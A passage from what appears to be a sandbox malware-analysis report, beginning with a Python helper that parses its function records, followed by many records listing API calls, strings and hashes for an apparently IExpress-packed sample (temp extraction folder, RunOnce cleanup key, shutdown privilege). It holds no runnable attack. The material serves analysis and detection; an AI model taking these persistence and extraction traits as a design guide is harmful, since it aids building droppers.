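        key, val = m["key"], m["val"]
        if key == "String ID":
            rec.strings = val.split("$")      # '$' is the report's item separator
        elif key == "API ID":
            rec.api_ids = val.split("$")
        elif key == "Source File":
            rec.source_file = val.split(",")[0]
            base = re.search(r"Offset:\s*([0-9A-Fa-f]+)", val)
            rec.image_base = int(base.group(1), 16) if base else None
    return rec

def api_rvas(rec: FunctionRecord) -> Dict[str, int]:
    """Call-site RVAs relative to the dump's image base, for direct calls only;
    subcall refs belong to another function's body."""
    if rec.image_base is None:
        return {}
    return {a.api: a.ref - rec.image_base for a in rec.apis if a.caller is None}

def tag_strings(rec: FunctionRecord) -> Dict[str, str]:
    """Map each string in the record to the first indicator tag it matches."""
    tags: Dict[str, str] = {}
    for s in rec.strings:
        for pat, tag in INDICATOR_TAGS:
            if pat.search(s):
                tags[s] = tag
                break
    return tags

# Constructed samples: lines copied from the two records above.
SAMPLE_TEMPDIR = r"""
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6975A2CE1), ref: 00007FF6975A657C
• CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6975A2CE1), ref: 00007FF6975A662F
  • Part of subcall function 00007FF6975A63B8: GetTempFileNameA.KERNEL32 ref: 00007FF6975A645B
• Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
• API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
"""
SAMPLE_RUNONCE = r"""
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
"""

if __name__ == "__main__":
    rec = parse_record(SAMPLE_TEMPDIR)
    for a in rec.apis:
        where = f" (inside subcall {a.caller:X})" if a.caller else ""
        print(f"{a.module}!{a.api} @ {a.ref:X}{where}")
    print({k: hex(v) for k, v in api_rvas(rec).items()})
    print(tag_strings(parse_record(SAMPLE_RUNONCE)))
```

                                                          The RVAs are what you feed to a disassembler opened on the dumped image (base 00007FF6975A0000 here); the subcall entries are deliberately excluded from that map because their ref addresses sit in the callee, not in the function the record describes.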

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 3183975587-3916222277
                                                          • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                          • Instruction ID: 370fa9c84a84c8e6aa3038241eed25f195a568def752958e99d6f53cd354f24f
                                                          • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                          • Instruction Fuzzy Hash: 215161329087828AF7F89B54F45437AB7A0FB887E5F044175D64D866A8CF7CD844CB20

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: OpenQuery$CloseInfoValue
                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                          • API String ID: 2209512893-559176071
                                                          • Opcode ID: 9f23079a79aaf393f30d7d52ead263bb4ecc079f7f4d037dad90965ff67e785b
                                                          • Instruction ID: cfe85f7e59451902a1de849117f1dea386da0f02b8553b332a4b41344fea24ce
                                                          • Opcode Fuzzy Hash: 9f23079a79aaf393f30d7d52ead263bb4ecc079f7f4d037dad90965ff67e785b
                                                          • Instruction Fuzzy Hash: 03318132B08B41CBD7A48F25F8416A9B7A4FB897A4F844575EB8D83B58DF38D054CB50

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                          • String ID: IXP$IXP%03d.TMP
                                                          • API String ID: 1082909758-3932986939
                                                          • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                          • Instruction ID: e07ea5e00140c40ac5bb82d8eb8f1cc2a9567b63357bbe1075449f226dd3837a
                                                          • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                          • Instruction Fuzzy Hash: AD216171A0894186EB689B12A9903F97791FF8DBE0F858170DD4E87795CF3CD445C610
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                          • String ID:
                                                          • API String ID: 2995914023-0
                                                          • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                          • Instruction ID: f32be0e518e7b98fcbdc5a93ca3e5f17e3ac0cfaefbfee0a5fa473731c3f7ced
                                                          • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                          • Instruction Fuzzy Hash: 1A510531E08A4686EBB98B61E85037926A4FF447E4F9400B5DA4EC72A5DF3DF845C728
                                                          APIs
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5078
                                                            • Part of subcall function 00007FF6975A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5089
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50AF
                                                            • Part of subcall function 00007FF6975A5050: LoadResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50C0
                                                            • Part of subcall function 00007FF6975A5050: LockResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50CF
                                                            • Part of subcall function 00007FF6975A5050: memcpy_s.MSVCRT ref: 00007FF6975A50EE
                                                            • Part of subcall function 00007FF6975A5050: FreeResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50FD
                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6975A3123), ref: 00007FF6975A60C9
                                                          • LocalFree.KERNEL32 ref: 00007FF6975A6142
                                                            • Part of subcall function 00007FF6975A4DCC: LoadStringA.USER32 ref: 00007FF6975A4E60
                                                            • Part of subcall function 00007FF6975A4DCC: MessageBoxA.USER32 ref: 00007FF6975A4EA0
                                                            • Part of subcall function 00007FF6975A7700: GetLastError.KERNEL32 ref: 00007FF6975A7704
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                          • String ID: $<None>$UPROMPT
                                                          • API String ID: 957408736-2569542085
                                                          • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                          • Instruction ID: f7fab13b29cb76ff3ad5d5411d6ebb306ecd65b7dc1c4f5aaf1e15426630d201
                                                          • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                          • Instruction Fuzzy Hash: 74319471A08642C7FBF85B20E55077A7A61FF897E4F008175CA0E86695DF7DD4048B60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CreateFile$lstrcmp
                                                          • String ID: *MEMCAB
                                                          • API String ID: 1301100335-3211172518
                                                          • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                          • Instruction ID: 1dd7f8a1033911bc301edcede989ceb4c0a9f86b959ffe6130d477178bf9c0a7
                                                          • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                          • Instruction Fuzzy Hash: BE61B5A2E0874286FBB88F15A4807797A91FB49BF4F5453B5DA6E827C0DF7CE4058620
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: FileTime$AttributesDateLocalTextWindow
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 1150793416-388467436
                                                          • Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                          • Instruction ID: bc459da13d2f0d4774d6ea195ca1544ccec6f4de21ec9906ea104000d0bf1c9e
                                                          • Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                          • Instruction Fuzzy Hash: 595193B2A18A4385FBF89B11D4409BD27A0FB48BF0F5441B1EA4EC7296DE3CE545C360
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Window$CapsDeviceRect$Release
                                                          • String ID:
                                                          • API String ID: 2212493051-0
                                                          • Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                          • Instruction ID: b7ac07c075faf712f558efa7940aeb57eb25c334e0a504270446c090d291d378
                                                          • Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                          • Instruction Fuzzy Hash: 3B318232B149518EE7A48B75E8045BD7FB0F749BA9F545170CE0A97B48CF3DE4458B10
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: AllocLocal
                                                          • String ID: TMP4351$.TMP
                                                          • API String ID: 3494564517-2619824408
                                                          • Opcode ID: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                          • Instruction ID: 4c1cd9970bbe70aac245eff5f1c246ab9ea53091dc094b5a346819a1cb7753c0
                                                          • Opcode Fuzzy Hash: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                          • Instruction Fuzzy Hash: BA31B171A0875587FBA89B24A41037ABA90FB85BF4F444374DA6E87BD5CF3CD8058710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                          • String ID:
                                                          • API String ID: 1214682469-0
                                                          • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                          • Instruction ID: 2930f86eaacc43f4072e577ec0cab23151cda24f9685c346b40e326c74914d7c
                                                          • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                          • Instruction Fuzzy Hash: CD115171A08B4586EAA48B11F44026ABBA0FB99FF0F484774DE9D47BE8DF3CD4408B14
                                                          APIs
                                                            • Part of subcall function 00007FF6975A3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF6975A3A09), ref: 00007FF6975A3B64
                                                            • Part of subcall function 00007FF6975A3B40: PeekMessageA.USER32 ref: 00007FF6975A3B89
                                                            • Part of subcall function 00007FF6975A3B40: PeekMessageA.USER32 ref: 00007FF6975A3BCD
                                                          • WriteFile.KERNELBASE ref: 00007FF6975A56E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                          • String ID:
                                                          • API String ID: 1084409-0
                                                          • Opcode ID: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                          • Instruction ID: d2dc53c208f2a31555bb5e737841d07bd90c1767f23a25163dfb6a8fcf54c818
                                                          • Opcode Fuzzy Hash: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                          • Instruction Fuzzy Hash: A721A160A0864286EBB88F15E844B75B7A0FF84BF8F148274D92D876E8CF3DD405CB50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                          • String ID:
                                                          • API String ID: 2018477427-0
                                                          • Opcode ID: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                          • Instruction ID: 1d69f5c080947587b324661d690dff3cf5ac04e84ca79c989327964b1003b7f5
                                                          • Opcode Fuzzy Hash: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                          • Instruction Fuzzy Hash: 2E117C7190C68282F7F84B50A58437566A0FF457F8F1842B0CA4DC6AA5CF7EE884C310
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CharPrev
                                                          • String ID:
                                                          • API String ID: 122130370-0
                                                          • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                          • Instruction ID: 361202af8b4effbc7edc08c701f9858d038fa079dc0ec75205583d3447b60134
                                                          • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                          • Instruction Fuzzy Hash: F901F951A0C7C186F7A54F11A84036DBE90E785BF0F5896B0DB69877E5CF2CD8428B50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                          • Instruction ID: 1110b8b1bbfa7e43174ebe7574242c3e6b03c4ddb1575fcb495b5b69327c3e32
                                                          • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                          • Instruction Fuzzy Hash: C9F03071608782D2EB6C4F25F68157976B0FB48BE8F144279DA2B9B6C8CF78D581C720
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                          • String ID: $52352352352$C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 3530494346-1973814555
                                                          • Opcode ID: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                          • Instruction ID: d0cb5bc4b6c3475c7f20b73bb75e483ad6fae6f87ceb4be708bbd0ba2acfa2a8
                                                          • Opcode Fuzzy Hash: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                          • Instruction Fuzzy Hash: 07718761E0C78286FBFC9B25A4143796A91FF8ABE4F5481B0DA4E87699CF3CD505C720
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 2168512254-0
                                                          • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                          • Instruction ID: 0bfa80aa147fb2d9c7b9fa35b75949db5bb66b8b11eeef8e7c38c15ffe0715c1
                                                          • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                          • Instruction Fuzzy Hash: 94515E32A04A51CEEB648F25E4801B97BB4FB4DBE8F4151B5DA0E93758DF38D444CB50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 2829607268-3733053543
                                                          • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                          • Instruction ID: d9c4ab4415d805b2d0d7e8e697111864e47174dbc1a0e190de3719c7b0f58729
                                                          • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                          • Instruction Fuzzy Hash: BB21B472A18A42C7FBB48B60E05577ABBB0FB897A5F409175DA4E87A58DF3CD044CB10
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 4104442557-0
                                                          • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                          • Instruction ID: 0ef56db9b027ec402d5299045aa5eb126e8e44ea4b57c5f4bac1da949533b81b
                                                          • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                          • Instruction Fuzzy Hash: A0112122A04B418AEF64DF61E8442A933A4FB497A8F400A34EA6D87754EF7CD5A48350
                                                          APIs
                                                          Memory Dump Source
